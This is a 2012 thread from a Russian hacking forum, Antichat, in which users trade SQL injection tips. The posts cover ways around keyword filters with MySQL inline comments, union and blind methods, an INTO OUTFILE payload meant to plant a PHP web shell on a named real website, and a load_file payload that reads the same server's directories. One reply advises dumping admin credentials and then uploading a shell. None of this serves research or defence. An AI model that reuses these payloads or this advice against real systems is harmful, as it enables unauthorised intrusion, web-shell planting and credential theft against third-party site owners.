HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #20571  
Старый 02.05.2012, 21:49
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от boortyhuhtyu  
boortyhuhtyu said:
есть варианты раскрутить скуль если на серве ssl шифрование и ошибки отключены?
а чем ssl Может мешать твоей скуле?

ошибки отключены значит error based не катит, пробуй стандартный метод union select, Или посимвольно
 
Ответить с цитированием

  #20572  
Старый 02.05.2012, 21:51
boortyhuhtyu
Guest
Сообщений: n/a
Провел на форуме:
225312

Репутация: -6
По умолчанию

Цитата:
Сообщение от Konqi  
Konqi said:
а чем ssl Может мешать твоей скуле?
ошибки отключены значит error based не катит, пробуй стандартный метод union select, Или посимвольно
ну я впринцепи хотел услышать ответ только о ssl.спасибо ;_)
 
Ответить с цитированием

  #20573  
Старый 03.05.2012, 16:54
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401

Репутация: 0
По умолчанию

посоны, нид хелп. наглухо фильтруется union, select, from. любое наличие одного из операторов приводит к редиректу, урл кодирование не помогло, нормализации нет (uni/**/on), POST фильтруется. хз что можно ещё придумать, но придумать нужно кровь из носа.
 
Ответить с цитированием

  #20574  
Старый 03.05.2012, 17:25
Га-Ноцри
Guest
Сообщений: n/a
Провел на форуме:
103014

Репутация: 76
По умолчанию

Цитата:
Сообщение от d1v  
d1v said:
посоны, нид хелп. наглухо фильтруется union, select, from. любое наличие одного из операторов приводит к редиректу, урл кодирование не помогло, нормализации нет (uni/**/on), POST фильтруется. хз что можно ещё придумать, но придумать нужно кровь из носа.
Обычно, когда я натыкаюсь на всякие редиректы, а также отданные сервером странички типа "Not Acceptable" и "Method Not Implemented" балуюсь с материалами из этой методички. Ну и нужно помнить про /*!sql-code*/ и /*!12345sql-code*/ Возможно, поможет.
 
Ответить с цитированием

  #20575  
Старый 03.05.2012, 17:28
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401

Репутация: 0
По умолчанию

Цитата:
Сообщение от Га-Ноцри  
Га-Ноцри said:
Обычно, когда я натыкаюсь на всякие редиректы, а также отданные сервером странички типа "Not Acceptable" и "Method Not Implemented" балуюсь с материалами из
этой методички.
Ну и нужно помнить про /*!sql-code*/ и /*!12345sql-code*/ Возможно, поможет.
я ведь написал - ЛЮБОЕ наличие оператора приводит к редиректу. все тривиальные методы испробованы.
 
Ответить с цитированием

  #20576  
Старый 03.05.2012, 17:32
Га-Ноцри
Guest
Сообщений: n/a
Провел на форуме:
103014

Репутация: 76
По умолчанию

Цитата:
Сообщение от d1v  
d1v said:
я ведь написал - ЛЮБОЕ наличие оператор приводит к редиректу. все тривиальные методы испробованы.
Ну, я же не телепат и не могу знать, что конкретно вы использовали. Просто привел справочный материал, в котором довольно полно собраны все, как вы выразились, тривиальные методы. Ведь вполне возможно, вы что-то могли и упустить. В любом случае, я всего лишь хотел помочь. Удачи в вашем мозговом штурме.
 
Ответить с цитированием

  #20577  
Старый 04.05.2012, 16:19
skier529
Новичок
Регистрация: 08.05.2009
Сообщений: 8
Провел на форуме:
49568

Репутация: 1
По умолчанию

Пациент:

Fiile_priv Y + доступ к PhpInfo.

Пробовал залить мини-шелл след образом:

Цитата:
Сообщение от None  
http://www.aviel.ru/txt/new.php?id=32270-9.999+union+select+1,'',3,4,5,6,7,8,9,10,11+from+m ysql.user+into+outfile+'/usr/local/www/aviel/www/txt/images/s.php'--
Выдает ошибку:

Цитата:
Сообщение от None  
К сожалению, запрошеннaя Вами статья в настоящее время недоступна.
ЧТо можно с ним сделать?

P.S Если у кого-то есть время, то напишите плиз в ЛС, чтобы разобрать этот пример.

P.S1 эх, первый шелл был так близок =((...
 
Ответить с цитированием

  #20578  
Старый 04.05.2012, 16:47
Melfis
Guest
Сообщений: n/a
Провел на форуме:
195266

Репутация: 53
По умолчанию

Видимо вообще нету никуда прав на запись. Ищи админки от сайта/поддоменов, ищи пути до корней этих поддоменов, ищи настройки подключения к бд и таблицы с полями для авторизации, дампь лог/пас, заходи в админку и лей шел.
 
Ответить с цитированием

  #20579  
Старый 04.05.2012, 18:02
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию

skier529, у тебя там фряха стоит, поэтому можешь читать содержимое папки, а не только файла, потому пробуй админку посмотреть ну и тд и тп...

Пример:

Код:
Code:
http://www.aviel[antigoogle]ru/txt/new.php?id=32270-9.999+union+select+1,load_file('/usr/local/www/aviel/www')3,4,5,6,7,8,9,10,11+from+mysql.user+--+
 
Ответить с цитированием

  #20580  
Старый 04.05.2012, 20:37
Cock3r
Guest
Сообщений: n/a
Провел на форуме:
3318

Репутация: 0
По умолчанию

как получить список пользователей wordpress?без админки
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ